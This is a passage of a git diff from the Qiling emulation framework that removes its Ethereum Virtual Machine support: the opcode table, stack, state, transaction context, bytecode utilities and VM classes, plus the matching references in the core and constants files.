-DELEGATECALL = 0xf4 -CREATE2 = 0xf5 -STATICCALL = 0xfa -REVERT = 0xfd -SELFDESTRUCT = 0xff diff --git a/qiling/arch/evm/vm/opcodes.py b/qiling/arch/evm/vm/opcodes.py deleted file mode 100644 index 5f132ab03..000000000 --- a/qiling/arch/evm/vm/opcodes.py +++ /dev/null @@ -1,155 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from collections import namedtuple -opcode_map = namedtuple('opcode', ['mnemonic', 'description']) - -opcodes = { - 0x00: opcode_map('STOP', 'Halts execution.'), - 0x01: opcode_map('ADD', 'Addition operation.'), - 0x02: opcode_map('MUL', 'Multiplication operation.'), - 0x03: opcode_map('SUB', 'Subtraction operation.'), - 0x04: opcode_map('DIV', 'Integer division operation.'), - 0x05: opcode_map('SDIV', 'Signed integer division operation (truncated).'), - 0x06: opcode_map('MOD', 'Modulo remainder operation.'), - 0x07: opcode_map('SMOD', 'Signed modulo remainder operation.'), - 0x08: opcode_map('ADDMOD', 'Modulo addition operation.'), - 0x09: opcode_map('MULMOD', 'Modulo multiplication operation.'), - 0x0a: opcode_map('EXP', 'Exponential operation.'), - 0x0b: opcode_map('SIGNEXTEND', "Extend length of two's complement signed integer."), - - 0x10: opcode_map('LT', 'Less-than comparision.'), - 0x11: opcode_map('GT', 'Greater-than comparision.'), - 0x12: opcode_map('SLT', 'Signed less-than comparision.'), - 0x13: opcode_map('SGT', 'Signed greater-than comparision.'), - 0x14: opcode_map('EQ', 'Equality comparision.'), - 0x15: opcode_map('ISZERO', 'Simple not operator.'), - 0x16: opcode_map('AND', 'Bitwise AND operation.'), - 0x17: opcode_map('OR', 'Bitwise OR operation.'), - 0x18: opcode_map('XOR', 'Bitwise XOR operation.'), - 0x19: opcode_map('NOT', 'Bitwise NOT operation.'), - 0x1a: opcode_map('BYTE', 'Retrieve single byte from word.'), - 0x1b: opcode_map('SHL', 'Bitwise left shift'), - 0x1c: opcode_map('SHR', 'Bitwise right shift'), - 0x1d: opcode_map('SAR', 'Arithmetic bitwise right shift'), - - 0x20: opcode_map('SHA3', 'Compute Keccak-256 hash.'), # SHA3 - - 0x30: opcode_map('ADDRESS', 'Get address of currently executing account.'), - 0x31: opcode_map('BALANCE', 'Get balance of the given account.'), - 0x32: opcode_map('ORIGIN', 'Get execution origination address.'), - 0x33: opcode_map('CALLER', 'Get caller address.'), - 0x34: opcode_map('CALLVALUE', 'Get deposited value by the instruction/transaction responsible for this execution.'), - 0x35: opcode_map('CALLDATALOAD', 'Get input data of current environment.'), - 0x36: opcode_map('CALLDATASIZE', 'Get size of input data in current environment.'), - 0x37: opcode_map('CALLDATACOPY', 'Copy input data in current environment to memory.'), - 0x38: opcode_map('CODESIZE', 'Get size of code running in current environment.'), - 0x39: opcode_map('CODECOPY', 'Copy code running in current environment to memory.'), - 0x3a: opcode_map('GASPRICE', 'Get price of gas in current environment.'), - 0x3b: opcode_map('EXTCODESIZE', "Get size of an account's code."), - 0x3c: opcode_map('EXTCODECOPY', "Copy an account's code to memory."), - 0x3d: opcode_map('RETURNDATASIZE', "get size of return data buffer"), - 0x3e: opcode_map('RETURNDATACOPY', "copy return data in current environment to memory"), - - 0x40: opcode_map('BLOCKHASH', 'Get the hash of one of the 256 most recent complete blocks.'), - 0x41: opcode_map('COINBASE', "Get the block's beneficiary address."), - 0x42: opcode_map('TIMESTAMP', "Get the block's timestamp."), - 0x43: opcode_map('NUMBER', "Get the block's number."), - 0x44: opcode_map('DIFFICULTY', "Get the block's difficulty."), - 0x45: opcode_map('GASLIMIT', "Get the block's gas limit."), - - 0x50: opcode_map('POP', 'Remove item from stack.'), - 0x51: opcode_map('MLOAD', 'Load word from memory.'), - 0x52: opcode_map('MSTORE', 'Save word to memory.'), - 0x53: opcode_map('MSTORE8', 'Save byte to memory.'), - 0x54: opcode_map('SLOAD', 'Load word from storage.'), - 0x55: opcode_map('SSTORE', 'Save word to storage.'), - 0x56: opcode_map('JUMP', 'Alter the program counter.'), - 0x57: opcode_map('JUMPI', 'Conditionally alter the program counter.'), - 0x58: opcode_map('PC', 'Get the value of the program counter prior to the increment.'), - 0x59: opcode_map('MSIZE', 'Get the size of active memory in bytes.'), - 0x5a: opcode_map('GAS', 'Get the amount of available gas, including the corresponding reduction the amount of available gas.'), - 0x5b: opcode_map('JUMPDEST', 'Mark a valid destination for jumps.'), - - 0x60: opcode_map('PUSH1', 'Place 1 byte item on stack.'), - 0x61: opcode_map('PUSH2', 'Place 2-byte item on stack.'), - 0x62: opcode_map('PUSH3', 'Place 3-byte item on stack.'), - 0x63: opcode_map('PUSH4', 'Place 4-byte item on stack.'), - 0x64: opcode_map('PUSH5', 'Place 5-byte item on stack.'), - 0x65: opcode_map('PUSH6', 'Place 6-byte item on stack.'), - 0x66: opcode_map('PUSH7', 'Place 7-byte item on stack.'), - 0x67: opcode_map('PUSH8', 'Place 8-byte item on stack.'), - 0x68: opcode_map('PUSH9', 'Place 9-byte item on stack.'), - 0x69: opcode_map('PUSH10', 'Place 10-byte item on stack.'), - 0x6a: opcode_map('PUSH11', 'Place 11-byte item on stack.'), - 0x6b: opcode_map('PUSH12', 'Place 12-byte item on stack.'), - 0x6c: opcode_map('PUSH13', 'Place 13-byte item on stack.'), - 0x6d: opcode_map('PUSH14', 'Place 14-byte item on stack.'), - 0x6e: opcode_map('PUSH15', 'Place 15-byte item on stack.'), - 0x6f: opcode_map('PUSH16', 'Place 16-byte item on stack.'), - 0x70: opcode_map('PUSH17', 'Place 17-byte item on stack.'), - 0x71: opcode_map('PUSH18', 'Place 18-byte item on stack.'), - 0x72: opcode_map('PUSH19', 'Place 19-byte item on stack.'), - 0x73: opcode_map('PUSH20', 'Place 20-byte item on stack.'), - 0x74: opcode_map('PUSH21', 'Place 21-byte item on stack.'), - 0x75: opcode_map('PUSH22', 'Place 22-byte item on stack.'), - 0x76: opcode_map('PUSH23', 'Place 23-byte item on stack.'), - 0x77: opcode_map('PUSH24', 'Place 24-byte item on stack.'), - 0x78: opcode_map('PUSH25', 'Place 25-byte item on stack.'), - 0x79: opcode_map('PUSH26', 'Place 26-byte item on stack.'), - 0x7a: opcode_map('PUSH27', 'Place 27-byte item on stack.'), - 0x7b: opcode_map('PUSH28', 'Place 28-byte item on stack.'), - 0x7c: opcode_map('PUSH29', 'Place 29-byte item on stack.'), - 0x7d: opcode_map('PUSH30', 'Place 30-byte item on stack.'), - 0x7e: opcode_map('PUSH31', 'Place 31-byte item on stack.'), - 0x7f: opcode_map('PUSH32', 'Place 32-byte (full word) item on stack.'), - 0x80: opcode_map('DUP1', 'Duplicate 1st stack item.'), - 0x81: opcode_map('DUP2', 'Duplicate 2nd stack item.'), - 0x82: opcode_map('DUP3', 'Duplicate 3rd stack item.'), - 0x83: opcode_map('DUP4', 'Duplicate 4th stack item.'), - 0x84: opcode_map('DUP5', 'Duplicate 5th stack item.'), - 0x85: opcode_map('DUP6', 'Duplicate 6th stack item.'), - 0x86: opcode_map('DUP7', 'Duplicate 7th stack item.'), - 0x87: opcode_map('DUP8', 'Duplicate 8th stack item.'), - 0x88: opcode_map('DUP9', 'Duplicate 9th stack item.'), - 0x89: opcode_map('DUP10', 'Duplicate 10th stack item.'), - 0x8a: opcode_map('DUP11', 'Duplicate 11th stack item.'), - 0x8b: opcode_map('DUP12', 'Duplicate 12th stack item.'), - 0x8c: opcode_map('DUP13', 'Duplicate 13th stack item.'), - 0x8d: opcode_map('DUP14', 'Duplicate 14th stack item.'), - 0x8e: opcode_map('DUP15', 'Duplicate 15th stack item.'), - 0x8f: opcode_map('DUP16', 'Duplicate 16th stack item.'), - 0x90: opcode_map('SWAP1', 'Exchange 1st and 2nd stack items.'), - 0x91: opcode_map('SWAP2', 'Exchange 1st and 3rd stack items.'), - 0x92: opcode_map('SWAP3', 'Exchange 1st and 4th stack items.'), - 0x93: opcode_map('SWAP4', 'Exchange 1st and 5th stack items.'), - 0x94: opcode_map('SWAP5', 'Exchange 1st and 6th stack items.'), - 0x95: opcode_map('SWAP6', 'Exchange 1st and 7th stack items.'), - 0x96: opcode_map('SWAP7', 'Exchange 1st and 8th stack items.'), - 0x97: opcode_map('SWAP8', 'Exchange 1st and 9th stack items.'), - 0x98: opcode_map('SWAP9', 'Exchange 1st and 10th stack items.'), - 0x99: opcode_map('SWAP10', 'Exchange 1st and 11th stack items.'), - 0x9a: opcode_map('SWAP11', 'Exchange 1st and 12th stack items.'), - 0x9b: opcode_map('SWAP12', 'Exchange 1st and 13th stack items.'), - 0x9c: opcode_map('SWAP13', 'Exchange 1st and 14th stack items.'), - 0x9d: opcode_map('SWAP14', 'Exchange 1st and 15th stack items.'), - 0x9e: opcode_map('SWAP15', 'Exchange 1st and 16th stack items.'), - 0x9f: opcode_map('SWAP16', 'Exchange 1st and 17th stack items.'), - 0xa0: opcode_map('LOG0', 'Append log record with no topics.'), - 0xa1: opcode_map('LOG1', 'Append log record with one topic.'), - 0xa2: opcode_map('LOG2', 'Append log record with two topics.'), - 0xa3: opcode_map('LOG3', 'Append log record with three topics.'), - 0xa4: opcode_map('LOG4', 'Append log record with four topics.'), - 0xf0: opcode_map('CREATE', 'Create a new account with associated code.'), - 0xf1: opcode_map('CALL', 'Message-call into an account.'), - 0xf2: opcode_map('CALLCODE', "Message-call into this account with alternative account's code."), - 0xf3: opcode_map('RETURN', 'Halt execution returning output data.'), - 0xf4: opcode_map('DELEGATECALL', "like CALLCODE but keeps caller's value and sender"), - 0xfa: opcode_map('STATICCALL', 'like CALL but disallow state modifications'), - 0xfb: opcode_map('CREATE2', 'create new account with associated code at address `sha3(sender + salt + sha3(init code)) % 2**160`'), - 0xfd: opcode_map('REVERT', 'halt execution, revert state and return output data'), - 0xfe: opcode_map('INVALID', 'old ASSERTFAIL - invalid instruction for expressing runtime errors (e.g., division-by-zero)'), - 0xff: opcode_map('SELFDESTRUCT', 'Halt execution and register account for later deletion.') -} \ No newline at end of file diff --git a/qiling/arch/evm/vm/stack.py b/qiling/arch/evm/vm/stack.py deleted file mode 100644 index e207ce8ed..000000000 --- a/qiling/arch/evm/vm/stack.py +++ /dev/null @@ -1,216 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import logging - -from eth_utils import ( - big_endian_to_int, - int_to_big_endian, - ValidationError, -) -from ..exceptions import ( - InsufficientStack, - FullStack, -) -from ..validation import ( - validate_stack_bytes, - validate_stack_int, -) - -from typing import ( - List, - Tuple, - Union -) - -from ..abc import StackAPI - - -def _busted_type(item_type: type, value: Union[int, bytes]) -> ValidationError: - return ValidationError( - "Stack must always be bytes or int, " - f"got {item_type!r} type, val {value!r}" - ) - - -class Stack(StackAPI): - """ - VM Stack - """ - __slots__ = ['values', '_append', '_pop_typed', '__len__'] - logger = logging.getLogger('eth.vm.stack.Stack') - - # - # Performance Note: Operations that push to the stack have the data in some natural form: - # integer or bytes. Whatever operation is pulling from the stack, also has its preferred - # representation to work with. Typically, those two representations line up (pushed & pulled) - # so we save a notable amount of conversion time by storing heterogenous data on the stack, - # and converting only when necessary. - # - - def __init__(self) -> None: - values: List[Tuple[type, Union[int, bytes]]] = [] - self.values = values - # caching optimizations to avoid an attribute lookup on self.values - # This doesn't use `cached_property`, because it doesn't play nice with slots - self._append = values.append - self._pop_typed = values.pop - self.__len__ = values.__len__ - - def push_int(self, value: int) -> None: - if len(self.values) > 1023: - raise FullStack('Stack limit reached') - - validate_stack_int(value) - - self._append((int, value)) - - def push_bytes(self, value: bytes) -> None: - if len(self.values) > 1023: - raise FullStack('Stack limit reached') - - validate_stack_bytes(value) - - self._append((bytes, value)) - - def pop1_bytes(self) -> bytes: - # - # Note: This function is optimized for speed over readability. - # Knowing the popped type means that we can pop *very* quickly - # when the popped type matches the pushed type. - # - if not self.values: - raise InsufficientStack("Wanted 1 stack item as bytes, had none") - else: - item_type, popped = self._pop_typed() - if item_type is int: - return int_to_big_endian(popped) # type: ignore - elif item_type is bytes: - return popped # type: ignore - else: - raise _busted_type(item_type, popped) - - def pop1_int(self) -> int: - # - # Note: This function is optimized for speed over readability. - # - if not self.values: - raise InsufficientStack("Wanted 1 stack item as int, had none") - else: - item_type, popped = self._pop_typed() - if item_type is int: - return popped # type: ignore - elif item_type is bytes: - return big_endian_to_int(popped) # type: ignore - else: - raise _busted_type(item_type, popped) - - def pop1_any(self) -> Union[int, bytes]: - # - # Note: This function is optimized for speed over readability. - # - if not self.values: - raise InsufficientStack("Wanted 1 stack item, had none") - else: - _, popped = self._pop_typed() - return popped - - def pop_any(self, num_items: int) -> Tuple[Union[int, bytes], ...]: - # - # Note: This function is optimized for speed over readability. - # - if num_items > len(self.values): - raise InsufficientStack( - "Wanted %d stack items, only had %d", - num_items, - len(self.values), - ) - else: - neg_num_items = -1 * num_items - - # Quickest way to pop off multiple values from the end, in place - all_popped = reversed(self.values[neg_num_items:]) - del self.values[neg_num_items:] - - # This doesn't use the @to_tuple(generator) pattern, for added performance - return tuple(val for _, val in all_popped) - - def pop_ints(self, num_items: int) -> Tuple[int, ...]: - # - # Note: This function is optimized for speed over readability. - # - if num_items > len(self.values): - raise InsufficientStack( - "Wanted %d stack items, only had %d", - num_items, - len(self.values), - ) - else: - neg_num_items = -1 * num_items - - # Quickest way to pop off multiple values from the end, in place - all_popped = reversed(self.values[neg_num_items:]) - del self.values[neg_num_items:] - - type_cast_popped = [] - - # Convert any non-matching types to the requested type (int) - # This doesn't use the @to_tuple(generator) pattern, for added performance - for item_type, popped in all_popped: - if item_type is int: - type_cast_popped.append(popped) - elif item_type is bytes: - type_cast_popped.append(big_endian_to_int(popped)) # type: ignore - else: - raise _busted_type(item_type, popped) - - return tuple(type_cast_popped) # type: ignore - - def pop_bytes(self, num_items: int) -> Tuple[bytes, ...]: - # - # Note: This function is optimized for speed over readability. - # - if num_items > len(self.values): - raise InsufficientStack( - "Wanted %d stack items, only had %d", - num_items, - len(self.values), - ) - else: - neg_num_items = -1 * num_items - - all_popped = reversed(self.values[neg_num_items:]) - del self.values[neg_num_items:] - - type_cast_popped = [] - - # Convert any non-matching types to the requested type (int) - # This doesn't use the @to_tuple(generator) pattern, for added performance - for item_type, popped in all_popped: - if item_type is int: - type_cast_popped.append(int_to_big_endian(popped)) # type: ignore - elif item_type is bytes: - type_cast_popped.append(popped) # type: ignore - else: - raise _busted_type(item_type, popped) - - return tuple(type_cast_popped) - - def swap(self, position: int) -> None: - idx = -1 * position - 1 - try: - self.values[-1], self.values[idx] = self.values[idx], self.values[-1] - except IndexError: - raise InsufficientStack(f"Insufficient stack items for SWAP{position}") - - def dup(self, position: int) -> None: - if len(self.values) > 1023: - raise FullStack('Stack limit reached') - - peek_index = -1 * position - try: - self._append(self.values[peek_index]) - except IndexError: - raise InsufficientStack(f"Insufficient stack items for DUP{position}") diff --git a/qiling/arch/evm/vm/state.py b/qiling/arch/evm/vm/state.py deleted file mode 100644 index e63f14453..000000000 --- a/qiling/arch/evm/vm/state.py +++ /dev/null @@ -1,233 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -# from ....core import Qiling -from ..db.atomic import AtomicDB -from typing import Tuple, Type -from eth_typing import Address, BlockNumber, Hash32 -from eth_utils import ExtendedDebugLogger, get_extended_debug_logger -from eth_utils.toolz import nth -from ..abc import ( - AccountDatabaseAPI, - ComputationAPI, - ExecutionContextAPI, - MessageAPI, - StateAPI, - TransactionContextAPI, - TransactionExecutorAPI, - MetaWitnessAPI, -) -from ..constants import BLANK_ROOT_HASH, MAX_PREV_HEADER_DEPTH -from ..typing import JournalDBCheckpoint -from .._utils.datatypes import Configurable - - -class BaseState(Configurable, StateAPI): - # - # Set from __init__ - # - __slots__ = ['_db', 'execution_context', '_account_db'] - - computation_class: Type[ComputationAPI] = None - transaction_context_class: Type[TransactionContextAPI] = None - account_db_class: Type[AccountDatabaseAPI] = None - transaction_executor_class: Type[TransactionExecutorAPI] = None - - def __init__(self, - ql, - execution_context: ExecutionContextAPI, db=AtomicDB(), state_root=BLANK_ROOT_HASH) -> None: - self.ql = ql - self.execution_context = execution_context - self._account_db = self.get_account_db_class()(db, state_root) - - # - # Logging - # - @property - def logger(self) -> ExtendedDebugLogger: - return get_extended_debug_logger(f'eth.vm.state.{self.__class__.__name__}') - - # - # Block Object Properties (in opcodes) - # - @property - def coinbase(self) -> Address: - return self.execution_context.coinbase - - @property - def timestamp(self) -> int: - return self.execution_context.timestamp - - @property - def block_number(self) -> BlockNumber: - return self.execution_context.block_number - - @property - def difficulty(self) -> int: - return self.execution_context.difficulty - - @property - def gas_limit(self) -> int: - return self.execution_context.gas_limit - - # - # Access to account db - # - @classmethod - def get_account_db_class(cls) -> Type[AccountDatabaseAPI]: - if cls.account_db_class is None: - raise AttributeError(f"No account_db_class set for {cls.__name__}") - return cls.account_db_class - - @property - def state_root(self) -> Hash32: - return self._account_db.state_root - - def make_state_root(self) -> Hash32: - return self._account_db.make_state_root() - - def get_storage(self, address: Address, slot: int, from_journal: bool = True) -> int: - return self._account_db.get_storage(address, slot, from_journal) - - def set_storage(self, address: Address, slot: int, value: int) -> None: - return self._account_db.set_storage(address, slot, value) - - def delete_storage(self, address: Address) -> None: - self._account_db.delete_storage(address) - - def delete_account(self, address: Address) -> None: - self._account_db.delete_account(address) - - def get_balance(self, address: Address) -> int: - return self._account_db.get_balance(address) - - def set_balance(self, address: Address, balance: int) -> None: - self._account_db.set_balance(address, balance) - - def delta_balance(self, address: Address, delta: int) -> None: - self.set_balance(address, self.get_balance(address) + delta) - - def get_nonce(self, address: Address) -> int: - return self._account_db.get_nonce(address) - - def set_nonce(self, address: Address, nonce: int) -> None: - self._account_db.set_nonce(address, nonce) - - def increment_nonce(self, address: Address) -> None: - self._account_db.increment_nonce(address) - - def get_code(self, address: Address) -> bytes: - return self._account_db.get_code(address) - - def set_code(self, address: Address, code: bytes) -> None: - self._account_db.set_code(address, code) - - def get_code_hash(self, address: Address) -> Hash32: - return self._account_db.get_code_hash(address) - - def delete_code(self, address: Address) -> None: - self._account_db.delete_code(address) - - def has_code_or_nonce(self, address: Address) -> bool: - return self._account_db.account_has_code_or_nonce(address) - - def account_exists(self, address: Address) -> bool: - return self._account_db.account_exists(address) - - def touch_account(self, address: Address) -> None: - self._account_db.touch_account(address) - - def account_is_empty(self, address: Address) -> bool: - return self._account_db.account_is_empty(address) - - # - # Access self._chaindb - # - def snapshot(self) -> Tuple[Hash32, JournalDBCheckpoint]: - return self.state_root, self._account_db.record() - - def revert(self, snapshot: Tuple[Hash32, JournalDBCheckpoint]) -> None: - state_root, account_snapshot = snapshot - - # first revert the database state root. - self._account_db.state_root = state_root - # now roll the underlying database back - self._account_db.discard(account_snapshot) - - def commit(self, snapshot: Tuple[Hash32, JournalDBCheckpoint]) -> None: - _, account_snapshot = snapshot - self._account_db.commit(account_snapshot) - - def lock_changes(self) -> None: - self._account_db.lock_changes() - - def persist(self) -> MetaWitnessAPI: - return self._account_db.persist() - - # - # Access self.prev_hashes (Read-only) - # - def get_ancestor_hash(self, block_number: int) -> Hash32: - ancestor_depth = self.block_number - block_number - 1 - is_ancestor_depth_out_of_range = ( - ancestor_depth >= MAX_PREV_HEADER_DEPTH - or ancestor_depth < 0 - or block_number < 0 - ) - if is_ancestor_depth_out_of_range: - return Hash32(b'') - - try: - return nth(ancestor_depth, self.execution_context.prev_hashes) - except StopIteration: - # Ancestor with specified depth not present - return Hash32(b'') - - # - # Computation - # - def get_computation(self, - ql, - message: MessageAPI, - transaction_context: TransactionContextAPI) -> ComputationAPI: - if self.computation_class is None: - raise AttributeError("No `computation_class` has been set for this State") - else: - computation = self.computation_class(self, ql, message, transaction_context) - return computation - - # - # Transaction context - # - @classmethod - def get_transaction_context_class(cls) -> Type[TransactionContextAPI]: - if cls.transaction_context_class is None: - raise AttributeError("No `transaction_context_class` has been set for this State") - return cls.transaction_context_class - - # - # Execution - # - def get_transaction_executor(self) -> TransactionExecutorAPI: - return self.transaction_executor_class(self.ql, self) - - @classmethod - def get_transaction_context(cls, - message: MessageAPI) -> TransactionContextAPI: - return cls.get_transaction_context_class()( - gas_price=message.gas_price, - origin=message.sender, - ) - - -class BaseTransactionExecutor(TransactionExecutorAPI): - def __init__(self, ql, vm_state: StateAPI) -> None: - self.ql = ql - self.vm_state = vm_state - - def __call__(self, message: MessageAPI) -> ComputationAPI: - computation = self.build_computation(message) - finalized_computation = self.finalize_computation(message, computation) - return finalized_computation diff --git a/qiling/arch/evm/vm/transaction_context.py b/qiling/arch/evm/vm/transaction_context.py deleted file mode 100644 index 0d6270418..000000000 --- a/qiling/arch/evm/vm/transaction_context.py +++ /dev/null @@ -1,36 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import itertools - -from eth_typing import Address - -from ..abc import TransactionContextAPI -from ..validation import ( - validate_canonical_address, - validate_uint256, -) - - -class BaseTransactionContext(TransactionContextAPI): - __slots__ = ['_gas_price', '_origin', '_log_counter'] - - def __init__(self, gas_price: int, origin: Address) -> None: - validate_uint256(gas_price, title="TransactionContext.gas_price") - self._gas_price = gas_price - validate_canonical_address(origin, title="TransactionContext.origin") - self._origin = origin - self._log_counter = itertools.count() - - def get_next_log_counter(self) -> int: - return next(self._log_counter) - - @property - def gas_price(self) -> int: - return self._gas_price - - @property - def origin(self) -> Address: - return self._origin diff --git a/qiling/arch/evm/vm/utils.py b/qiling/arch/evm/vm/utils.py deleted file mode 100644 index 3ca066496..000000000 --- a/qiling/arch/evm/vm/utils.py +++ /dev/null @@ -1,84 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import re - - -def bytecode_to_bytes(bytecode): - if str(bytecode).startswith("0x"): - bytecode = str(bytecode)[2:] - - try: - bytecode = bytes.fromhex(bytecode) - # already bytes or bytearray - except TypeError: - pass - return bytecode - -def load_code_detector(bytecode): - '''Check for presence of runtime code - ''' - if isinstance(bytecode, bytes): - bytecode = bytecode.hex() - result = list(re.finditer('60.{2}604052', bytecode)) - load_bytecode = '' - rtcode_auxdata = bytecode - if len(result) > 1: - position = result[1].start() - # self.ql.dprint(D_INFO, "[+] Runtime code detected") - load_bytecode = bytecode[:position] - rtcode_auxdata = bytecode[position:] - return load_bytecode, rtcode_auxdata - -def runtime_code_detector(bytecode): - '''Check for presence of Swarm hash at the end of bytecode - https://github.com/ethereum/wiki/wiki/Swarm-Hash - ''' - if isinstance(bytecode, bytes): - bytecode = bytecode.hex() - result = list(re.finditer('a165627a7a7230.*0029', bytecode)) - # bzzr == 0x65627a7a72 - runtime_code = bytecode - aux_data = '' - constructor_args = '' - - if len(result) > 0: - auxdata_start = result[-1].start() - auxdata_end = result[-1].end() - if auxdata_start > 0: - # self.ql.dprint(D_INFO, "[+] Swarm hash detected in bytecode") - aux_data = bytecode[auxdata_start:auxdata_end] - # self.ql.dprint(D_INFO, "[+] Swarm hash value: 0x%s"%self.swarm_hash) - - # there is possibly constructor argument - # if there is swarm storage - if auxdata_end != len(bytecode): - constructor_args = bytecode[auxdata_end:] - # self.ql.dprint(D_INFO, "[+] Constructor arguments detected in bytecode") - # self.ql.dprint(D_INFO, "[+] Constructor arguments removed from bytecode") - # self.ql.dprint(D_INFO, "[+] Swarm hash removed from bytecode") - runtime_code = bytecode[:auxdata_start] - aux_data = bytecode[auxdata_start:auxdata_end] - return runtime_code, aux_data, constructor_args - -def analysis_bytecode(bytecode:bytes): - load_bytecode, rtcode_auxdata = load_code_detector(bytecode) - runtime_code, aux_data, constructor_args = runtime_code_detector(rtcode_auxdata) - return load_bytecode, runtime_code, aux_data, constructor_args - -def padding_txdata(tx_data:str): - if tx_data[:2] == '0x': - tx_data = tx_data[2:] - sign = tx_data[:8] - args = tx_data[8:] - last_argu_len = len(args) % 64 - - if last_argu_len != 0: - other_args = args[:-last_argu_len] - last_argu = args[-last_argu_len:].rjust(64, '0') - - return sign + other_args + last_argu - - diff --git a/qiling/arch/evm/vm/vm.py b/qiling/arch/evm/vm/vm.py deleted file mode 100644 index 3b2b94c64..000000000 --- a/qiling/arch/evm/vm/vm.py +++ /dev/null @@ -1,104 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -# from ....core import Qiling -from .state import BaseState -from .message import Message -from .defaultconf import MAINNET_GENESIS_HOST -from .execution_context import ExecutionContext -from .host import QlArchEVMHostInfo -from .._utils.datatypes import Configurable -from eth_typing import Address - - -class BaseVM(Configurable): - _state_class = None - _state = None - _block = None - - def __init__(self, ql) -> None: - self.ql = ql - self.transaction_context = None - - # - # State - # - - @property - def state(self) -> BaseState: - if self._state is None: - self._state = self.build_state(self.ql) - return self._state - - @classmethod - def build_state(cls, ql, HostInfo:QlArchEVMHostInfo=MAINNET_GENESIS_HOST): - execution_context = cls.create_execution_context(HostInfo) - return cls.get_state_class()(ql, execution_context) - - @classmethod - def get_state_class(cls): - if cls._state_class is None: - raise AttributeError("No `_state_class` has been set for this VM") - - return cls._state_class - - # - # Execution - # - - @classmethod - def create_execution_context(cls, HostInfo:QlArchEVMHostInfo=MAINNET_GENESIS_HOST): - return ExecutionContext( - coinbase=HostInfo.coinbase, - timestamp=HostInfo.timestamp, - block_number=HostInfo.block_number, - difficulty=HostInfo.difficulty, - gas_limit=HostInfo.gas_limit, - prev_hashes=HostInfo.prev_hashes, - chain_id=HostInfo.chain_id, - ) - - # - # Message - # - - def build_message(self, - origin: Address, - gas_price: int, - gas: int, - to: Address, - sender: Address, - value: int, - data: bytes, - code: bytes, - code_address: Address = None, - contract_address: Address = None - ): - return self.state.get_transaction_executor().build_evm_message(origin, gas_price, gas, to, sender, value, data, code, code_address, contract_address) - - @classmethod - def apply_create_message( - cls, - state, - message, - transaction_context): - ... - - @classmethod - def apply_message( - cls, - state, - message, - transaction_context): - ... - - def execute_message(self, message:Message): - return self.state.get_transaction_executor()(message) - - def emu_start(self, computation): - pass - - def emu_stop(self): - pass diff --git a/qiling/const.py b/qiling/const.py index fd06eefa3..b54359693 100644 --- a/qiling/const.py +++ b/qiling/const.py @@ -19,7 +19,6 @@ class QL_ARCH(IntEnum): ARM64 = 105 MIPS = 106 A8086 = 107 - EVM = 108 CORTEX_M = 109 RISCV = 110 RISCV64 = 111 @@ -33,7 +32,6 @@ class QL_OS(IntEnum): WINDOWS = 204 UEFI = 205 DOS = 206 - EVM = 207 QNX = 208 MCU = 209 BLOB = 210 @@ -72,8 +70,6 @@ class QL_STATE(Enum): STOPPED = 2 -QL_ARCH_INTERPRETER: Final = (QL_ARCH.EVM,) - QL_OS_POSIX: Final = (QL_OS.LINUX, QL_OS.FREEBSD, QL_OS.MACOS, QL_OS.QNX) QL_OS_BAREMETAL: Final = (QL_OS.MCU,) @@ -98,11 +94,10 @@ def __casefold_enum(e: Type[T]) -> Mapping[str, T]: debugger_map = __casefold_enum(QL_DEBUGGER) arch_os_map = { - QL_ARCH.EVM : QL_OS.EVM, QL_ARCH.CORTEX_M : QL_OS.MCU } __all__ = [ 'QL_ENDIAN', 'QL_ARCH', 'QL_OS', 'QL_VERBOSE', 'QL_DEBUGGER', 'QL_INTERCEPT', 'QL_STOP', - 'QL_ARCH_INTERPRETER', 'QL_OS_POSIX', 'QL_OS_BAREMETAL', 'QL_HOOK_BLOCK', 'QL_CALL_BLOCK' + 'QL_OS_POSIX', 'QL_OS_BAREMETAL', 'QL_HOOK_BLOCK', 'QL_CALL_BLOCK' ] diff --git a/qiling/core.py b/qiling/core.py index 4a98430b8..88445a1a6 100644 --- a/qiling/core.py +++ b/qiling/core.py @@ -21,7 +21,7 @@ from .loader.loader import QlLoader from .arch.models import QL_CPU -from .const import QL_ARCH, QL_ENDIAN, QL_OS, QL_STATE, QL_STOP, QL_VERBOSE, QL_ARCH_INTERPRETER, QL_OS_BAREMETAL +from .const import QL_ARCH, QL_ENDIAN, QL_OS, QL_STATE, QL_STOP, QL_VERBOSE, QL_OS_BAREMETAL from .exception import QlErrorFileNotFound, QlErrorArch, QlErrorOsType from .host import QlHost from .log import * @@ -152,9 +152,8 @@ def __init__( self._arch = select_arch(archtype, cputype, endian, thumb)(self) # Once we finish setting up arch, we can init QlCoreStructs and QlCoreHooks - if not self.interpreter: - QlCoreStructs.__init__(self, self.arch.endian, self.arch.bits) - QlCoreHooks.__init__(self, self.uc) + QlCoreStructs.__init__(self, self.arch.endian, self.arch.bits) + QlCoreHooks.__init__(self, self.uc) # emulation has not been started yet self._state = QL_STATE.NOT_SET @@ -181,9 +180,8 @@ def __init__( ############## # Components # ############## - if not self.interpreter: - self._mem = select_component('os', 'memory')(self) - self._os = select_os(ostype)(self) + self._mem = select_component('os', 'memory')(self) + self._os = select_os(ostype)(self) if self.baremetal: self._hw = select_component('hw', 'hw')(self) @@ -350,14 +348,6 @@ def targetname(self) -> str: """ return os.path.basename(self.path) - @property - def interpreter(self) -> bool: - """Indicate whether an interpreter engine is being emulated. - - Currently supporting: EVM - """ - return self.arch.type in QL_ARCH_INTERPRETER - @property def baremetal(self) -> bool: """Indicate whether a baremetal system is being emulated. @@ -365,10 +355,6 @@ def baremetal(self) -> bool: Currently supporting: MCU """ - # os is not initialized for interpreter archs - if self.interpreter: - return False - return self.os.type in QL_OS_BAREMETAL @cached_property diff --git a/qiling/extensions/r2/r2.py b/qiling/extensions/r2/r2.py index 9ec2ba4ae..516680b38 100644 --- a/qiling/extensions/r2/r2.py +++ b/qiling/extensions/r2/r2.py @@ -153,7 +153,6 @@ def _qlarch2r(self, archtype: QL_ARCH) -> str: QL_ARCH.ARM: "arm", 